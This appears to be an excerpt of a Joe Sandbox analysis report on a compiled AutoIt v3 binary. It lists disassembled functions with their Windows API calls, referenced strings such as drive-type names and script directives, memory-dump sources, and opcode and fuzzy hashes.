CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00707746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0070775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 0070776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0070779B
GetStockObject.GDI32(00000011), ref: 007077A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007077B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007077BB

Strings

DISPLAY, xrefs: 00707688
msctls_progress32, xrefs: 0070773C
static, xrefs: 0070767D, 00707795
AutoIt v3, xrefs: 0070762B

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: f408cdfeb68324cb1000d68b01e92535604f236ea0dcfd47d5504bbe059ace37
Instruction ID: 9116e69ae292ec7890afd7ac1b9da76384d4fdbc4ef3c779807f8ab9437328fc
Opcode Fuzzy Hash: f408cdfeb68324cb1000d68b01e92535604f236ea0dcfd47d5504bbe059ace37
Instruction Fuzzy Hash: 7FA145B1A40615BFEB14DB68DC4AFEE77B9EB04711F008118FA15A72E0D774AD40CB64

Function 006FAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 006FAD1E
GetDriveTypeW.KERNEL32(?,0071FAC0,?,\\.\,0071F910), ref: 006FADFB
SetErrorMode.KERNEL32(00000000,0071FAC0,?,\\.\,0071F910), ref: 006FAF59

Strings

USB, xrefs: 006FAEF0
SCSI, xrefs: 006FAEC6
CDROM, xrefs: 006FAE2F
iSCSI, xrefs: 006FAEFE
\\.\, xrefs: 006FAD70
SATA, xrefs: 006FAF0C
MMC, xrefs: 006FAF1A
Fixed, xrefs: 006FAE43
RAMDisk, xrefs: 006FAE25
Unknown, xrefs: 006FAE1B, 006FAEBF
1394, xrefs: 006FAEDB
ATA, xrefs: 006FAED4
ATAPI, xrefs: 006FAECD
SAS, xrefs: 006FAF05
SSA, xrefs: 006FAEE2
FileBackedVirtual, xrefs: 006FAF28
Virtual, xrefs: 006FAF21
SSD, xrefs: 006FAE86
Removable, xrefs: 006FAE4D
Fibre, xrefs: 006FAEE9
RAID, xrefs: 006FAEF7
Network, xrefs: 006FAE39
PhysicalDrive, xrefs: 006FADA7

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 5c5be02e8b59db9aab75d82aa1738bc77d8eefcab92dddca8ddc24c82add30ef
Instruction ID: 9166101e556f8aff82ac6c941987d13d390804c23053a1bc826da2c737651e1d
Opcode Fuzzy Hash: 5c5be02e8b59db9aab75d82aa1738bc77d8eefcab92dddca8ddc24c82add30ef
Instruction Fuzzy Hash: 575195F064524DDB8B80DF94C942CBD73A7EF09710720805AE60BAB391DB759D42EB63

Function 006968DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00696931
__wcsnicmp.LIBCMT ref: 00696949
__wcsnicmp.LIBCMT ref: 00696961
__wcsnicmp.LIBCMT ref: 00696979
__wcsnicmp.LIBCMT ref: 00696991
__wcsnicmp.LIBCMT ref: 006969A9
__wcsnicmp.LIBCMT ref: 006969C1
__wcsnicmp.LIBCMT ref: 006969D5
__wcsnicmp.LIBCMT ref: 00696A16
__wcsnicmp.LIBCMT ref: 00696A2A
__wcsnicmp.LIBCMT ref: 00696A3E
__wcsnicmp.LIBCMT ref: 00696A52

Strings

#include, xrefs: 006969A3
#notrayicon, xrefs: 00696943
#comments-end, xrefs: 00696A38
#cs, xrefs: 006969CF, 00696A24
#OnAutoItStartRegister, xrefs: 00696973
Cannot parse #include, xrefs: 006CE3F0
#ce, xrefs: 00696A4C
Bad directive syntax error, xrefs: 006CE31A
#include-once, xrefs: 0069698B
#requireadmin, xrefs: 0069695B
#comments-start, xrefs: 006969BB, 00696A10
Unterminated group of comments, xrefs: 006CE403
#pragma compile, xrefs: 0069692B

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 3fa358c410481cbfd6d039feb20fe3273aee42324676d6c9c9368fddd0afdf33
Instruction ID: ec1029fa231dbb1dd86102e1fc7a9f9bbcf320fafc8257ac761d253876110fb2
Opcode Fuzzy Hash: 3fa358c410481cbfd6d039feb20fe3273aee42324676d6c9c9368fddd0afdf33
Instruction Fuzzy Hash: 4C8115F06003166ADF21AA64DC42FFB376FEF01700F044029F805AA696EB65DE82D399

Function 00719A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00719AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00719B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00719BA7

Strings

0, xrefs: 00719BE4

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 80992298382075d9ad981db3a9e3e6d8c9ceb726de2b8bfe6d58dd8e98ad83f8
Instruction ID: 6b3cac4fdb5c459f7c0916290b3527ed1c9446a34f8b0a3a202c61ddaa0f26b7
Opcode Fuzzy Hash: 80992298382075d9ad981db3a9e3e6d8c9ceb726de2b8bfe6d58dd8e98ad83f8
Instruction Fuzzy Hash: 7E02EF31104301AFD725CF28C869BEABBE5FF49310F04852DFA95962E1C778D986CB92

Function 0071A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0071A903
SetTextColor.GDI32(?,?), ref: 0071A907
GetSysColorBrush.USER32(0000000F), ref: 0071A91D
GetSysColor.USER32(0000000F), ref: 0071A928
CreateSolidBrush.GDI32(?), ref: 0071A92D
GetSysColor.USER32(00000011), ref: 0071A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0071A953
SelectObject.GDI32(?,00000000), ref: 0071A964
SetBkColor.GDI32(?,00000000), ref: 0071A96D
SelectObject.GDI32(?,?), ref: 0071A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 0071A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0071A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 0071A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0071A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0071AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 0071AA32
DrawFocusRect.USER32(?,?), ref: 0071AA3D
GetSysColor.USER32(00000011), ref: 0071AA4B
SetTextColor.GDI32(?,00000000), ref: 0071AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0071AA67
SelectObject.GDI32(?,0071A5FA), ref: 0071AA7E
DeleteObject.GDI32(?), ref: 0071AA89
SelectObject.GDI32(?,?), ref: 0071AA8F
DeleteObject.GDI32(?), ref: 0071AA94
SetTextColor.GDI32(?,?), ref: 0071AA9A
SetBkColor.GDI32(?,?), ref: 0071AAA4

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: f040b5bc60fb9ed4c03fa818facfa6b6a615a67525f02ce4f42e4a2252b4e823
Instruction ID: 3fb8116835fb71c4c4e6b8e045cb83379a4005e38a073cd11bfa2f373686c67d
Opcode Fuzzy Hash: f040b5bc60fb9ed4c03fa818facfa6b6a615a67525f02ce4f42e4a2252b4e823
Instruction Fuzzy Hash: 78512C71901208FFDB119FA8DC48EEE7B79EF08320F118625F915AB2E1D7799980DB94

Function 007189D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00718AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00718AD2
CharNextW.USER32(0000014E), ref: 00718B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00718B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00718B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00718B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00718B86
SetWindowTextW.USER32(?,0000014E), ref: 00718BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00718BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00718C1F
_memset.LIBCMT ref: 00718C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00718C8D
_memset.LIBCMT ref: 00718CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00718D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00718D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00718E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00718E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00718E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00718EB4
DrawMenuBar.USER32(?), ref: 00718EC3
SetWindowTextW.USER32(?,0000014E), ref: 00718EEB

Strings

0, xrefs: 00718E55

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: ff77b454b6cc0ec3be799a89481ab8e278d61373331000b7d92f60d1bc09f8d7
Instruction ID: 4cc69d8079ad8bc2ccefb1b10ce2635b04ce62468fff5a1fc7569ee3e054343a
Opcode Fuzzy Hash: ff77b454b6cc0ec3be799a89481ab8e278d61373331000b7d92f60d1bc09f8d7
Instruction Fuzzy Hash: F2E17070900208ABDB60DF68CC85EEE7BB9EF09710F10815AF915AA2D0DB7899C5DF65

Function 0071488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 007149CA
GetDesktopWindow.USER32 ref: 007149DF
GetWindowRect.USER32(00000000), ref: 007149E6
GetWindowLongW.USER32(?,000000F0), ref: 00714A48
DestroyWindow.USER32(?), ref: 00714A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00714A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00714ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00714AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00714AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00714B09
IsWindowVisible.USER32(?), ref: 00714B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00714B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00714B58
GetWindowRect.USER32(?,?), ref: 00714B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00714B96
GetMonitorInfoW.USER32(00000000,?), ref: 00714BB0
CopyRect.USER32(?,?), ref: 00714BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00714C32

Strings

(, xrefs: 00714BA3
tooltips_class32, xrefs: 00714A96
0, xrefs: 00714975

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 41c791456c6a64aa29c102104089a2e1f5aca3a3bbf432a8b4f18896f963ac8a
Instruction ID: 7424fee2e845e15b1f7ae5b8582b4f358c7baf45758c8ccf4f304eeda182a52d
Opcode Fuzzy Hash: 41c791456c6a64aa29c102104089a2e1f5aca3a3bbf432a8b4f18896f963ac8a
Instruction Fuzzy Hash: 89B19C70608340AFDB44DF68C849BAABBE5FF84710F00891CF5999B2A1D779EC45CB99

Function 006F449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 006F44AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 006F44D2
_wcscpy.LIBCMT ref: 006F4500
_wcscmp.LIBCMT ref: 006F450B
_wcscat.LIBCMT ref: 006F4521
_wcsstr.LIBCMT ref: 006F452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 006F4548
_wcscat.LIBCMT ref: 006F4591
_wcscat.LIBCMT ref: 006F4598
_wcsncpy.LIBCMT ref: 006F45C3

Strings

04090000, xrefs: 006F457E
%u.%u.%u.%u, xrefs: 006F4626
DefaultLangCodepage, xrefs: 006F45AB
\VarFileInfo\Translation, xrefs: 006F4540
StringFileInfo\, xrefs: 006F451B

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 60c374d2fdb581ae083e2c952b28272a2572b8d82dd863ec730d0f3275efbd3a
Instruction ID: 292a5ab3aaac61a31188a2fce57c78ce801fc5ccd941895f7eb3c32d36215ee1
Opcode Fuzzy Hash: 60c374d2fdb581ae083e2c952b28272a2572b8d82dd863ec730d0f3275efbd3a
Instruction Fuzzy Hash: E641D4B16002057BEB50BB748C46EFF77ADDF42710F004169FA04E62C2EE289A4197AA

Function 006927D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006928BC
GetSystemMetrics.USER32(00000007), ref: 006928C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006928EF
GetSystemMetrics.USER32(00000008), ref: 006928F7
GetSystemMetrics.USER32(00000004), ref: 0069291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00692939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00692949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0069297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00692990
GetClientRect.USER32(00000000,000000FF), ref: 006929AE
GetStockObject.GDI32(00000011), ref: 006929CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 006929D5

Part of subcall function 00692344: GetCursorPos.USER32(?), ref: 00692357
Part of subcall function 00692344: ScreenToClient.USER32(007557B0,?), ref: 00692374
Part of subcall function 00692344: GetAsyncKeyState.USER32(00000001), ref: 00692399
Part of subcall function 00692344: GetAsyncKeyState.USER32(00000002), ref: 006923A7

SetTimer.USER32(00000000,00000000,00000028,00691256), ref: 006929FC

Strings

AutoIt v3 GUI, xrefs: 00692974

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 7c36d239012f675505405756aabe2b36cb63bcce563978434c38582e205d8bbb
Instruction ID: 19dad10eef15aaa72a635389456c2b077775ae68fa35f337c995ab7aa9969f6c
Opcode Fuzzy Hash: 7c36d239012f675505405756aabe2b36cb63bcce563978434c38582e205d8bbb
Instruction Fuzzy Hash: 2AB13D7160020AEFDF14DFA8DD55BED7BBAFB08311F108129FA15A62E0DB78A851CB54

Function 006EA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 006EA47A
__swprintf.LIBCMT ref: 006EA51B
_wcscmp.LIBCMT ref: 006EA52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 006EA583
_wcscmp.LIBCMT ref: 006EA5BF
GetClassNameW.USER32(?,?,00000400), ref: 006EA5F6
GetDlgCtrlID.USER32(?), ref: 006EA648
GetWindowRect.USER32(?,?), ref: 006EA67E
GetParent.USER32(?), ref: 006EA69C
ScreenToClient.USER32(00000000), ref: 006EA6A3
GetClassNameW.USER32(?,?,00000100), ref: 006EA71D
_wcscmp.LIBCMT ref: 006EA731
GetWindowTextW.USER32(?,?,00000400), ref: 006EA757
_wcscmp.LIBCMT ref: 006EA76B

Part of subcall function 006B362C: _iswctype.LIBCMT ref: 006B3634

Strings

%s%u, xrefs: 006EA515

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 9c394c6181ce9ed38d20b3df5eaf63302bc69d7a8df63aa4d293517601f9817d
Instruction ID: dd73de23b347d9b22ec9255ee323ce09b831caee524e96d3adc469f18f03d5ea
Opcode Fuzzy Hash: 9c394c6181ce9ed38d20b3df5eaf63302bc69d7a8df63aa4d293517601f9817d
Instruction Fuzzy Hash: D0A1DF71205346AFDB14DFA5C884BEAB7EAFF44314F008629F999C6290DB30F955CB92

Function 006EAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 006EAF18
_wcscmp.LIBCMT ref: 006EAF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 006EAF51
CharUpperBuffW.USER32(?,00000000), ref: 006EAF6E
_wcscmp.LIBCMT ref: 006EAF8C
_wcsstr.LIBCMT ref: 006EAF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 006EAFD5
_wcscmp.LIBCMT ref: 006EAFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 006EB00C
GetClassNameW.USER32(00000018,?,00000400), ref: 006EB055
_wcscmp.LIBCMT ref: 006EB065
GetClassNameW.USER32(00000010,?,00000400), ref: 006EB08D
GetWindowRect.USER32(00000004,?), ref: 006EB0F6

Strings

ThumbnailClass, xrefs: 006EAFE0, 006EB060
@, xrefs: 006EAEF9

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 041c523de56ab69e9aff6af1e9cd6d612805ef6620ea3d83b04ca1afd590e030
Instruction ID: 2a1ffe0140902564d02248cf084403f8be3eb5fb7946b0ccc2c77e7a357ca26b
Opcode Fuzzy Hash: 041c523de56ab69e9aff6af1e9cd6d612805ef6620ea3d83b04ca1afd590e030
Instruction Fuzzy Hash: EF81DE711093859BDB00DF16C881BEB77EAEF44314F04846EFD858A295DB34ED89CBA5

Function 0071C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623

DragQueryPoint.SHELL32(?,?), ref: 0071C627

Part of subcall function 0071AB37: ClientToScreen.USER32(?,?), ref: 0071AB60
Part of subcall function 0071AB37: GetWindowRect.USER32(?,?), ref: 0071ABD6
Part of subcall function 0071AB37: PtInRect.USER32(?,?,0071C014), ref: 0071ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 0071C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0071C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0071C6BE
_wcscat.LIBCMT ref: 0071C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0071C705
SendMessageW.USER32(?,000000B0,?,?), ref: 0071C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 0071C735
SendMessageW.USER32(?,000000B1,?,?), ref: 0071C757
DragFinish.SHELL32(?), ref: 0071C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0071C851

Strings

@GUI_DRAGFILE, xrefs: 0071C800
pbu, xrefs: 0071C79B
@GUI_DROPID, xrefs: 0071C77E
@GUI_DRAGID, xrefs: 0071C7C9

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbu
API String ID: 169749273-3108296618
Opcode ID: 5315ae5921f8df5ff91ffa0e1b87f2efb3fad3e865387ecd8bcb67496e346929
